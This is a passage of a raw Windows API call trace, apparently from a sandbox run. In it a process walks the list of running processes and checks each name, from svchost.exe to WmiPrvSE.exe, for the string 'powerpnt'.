StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.876] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.878] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35789d8 [0098.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35789d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.878] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.878] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.878] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.879] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578b70 [0098.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578b70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.879] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.879] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.879] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.880] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578a68 [0098.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578a68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.881] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.881] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.881] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.882] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578a80 [0098.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578a80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.882] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.882] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.882] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.883] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35789f0 [0098.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35789f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.883] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.883] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.883] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.885] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578b40 [0098.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578b40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.885] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.885] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.885] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.886] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578a98 [0098.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578a98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.886] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.886] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.886] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.887] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578b10 [0098.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578b10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.887] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.887] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.887] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.889] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578ab0 [0098.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578ab0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.889] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.889] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.889] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0098.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.890] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578b88 [0098.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3578b88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0098.890] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0098.890] StrStrIA (lpFirst="spoolsv.exe", lpSrch="powerpnt") returned 0x0 [0098.890] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.891] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578ac8 [0098.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578ac8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.892] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.892] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.892] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0098.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.893] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578ae0 [0098.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3578ae0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0098.893] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0098.893] StrStrIA (lpFirst="audiodg.exe", lpSrch="powerpnt") returned 0x0 [0098.893] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0098.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.915] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578b28 [0098.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3578b28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0098.915] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0098.915] StrStrIA (lpFirst="sihost.exe", lpSrch="powerpnt") returned 0x0 [0098.915] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.916] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578bd0 [0098.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578bd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.916] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.916] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.916] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.918] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578be8 [0098.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3578be8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0098.918] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0098.918] StrStrIA (lpFirst="taskhostw.exe", lpSrch="powerpnt") returned 0x0 [0098.918] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0098.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.919] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578c00 [0098.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3578c00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0098.919] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0098.919] StrStrIA (lpFirst="explorer.exe", lpSrch="powerpnt") returned 0x0 [0098.919] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0098.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.921] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a1f8 [0098.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357a1f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0098.921] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0098.921] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="powerpnt") returned 0x0 [0098.921] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0098.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0098.922] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356baa0 [0098.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356baa0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0098.922] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0098.922] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="powerpnt") returned 0x0 [0098.922] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0098.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.923] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a138 [0098.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357a138, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0098.923] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0098.924] StrStrIA (lpFirst="Memory Compression", lpSrch="powerpnt") returned 0x0 [0098.924] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0098.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.926] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357a418 [0098.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357a418, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0098.926] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0098.926] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="powerpnt") returned 0x0 [0098.926] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0098.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.927] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578c18 [0098.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3578c18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0098.927] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0098.927] StrStrIA (lpFirst="SearchUI.exe", lpSrch="powerpnt") returned 0x0 [0098.927] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0098.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.929] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a258 [0098.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357a258, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0098.929] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0098.929] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="powerpnt") returned 0x0 [0098.929] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0098.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.930] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578c30 [0098.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3578c30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0098.930] lstrcpyA 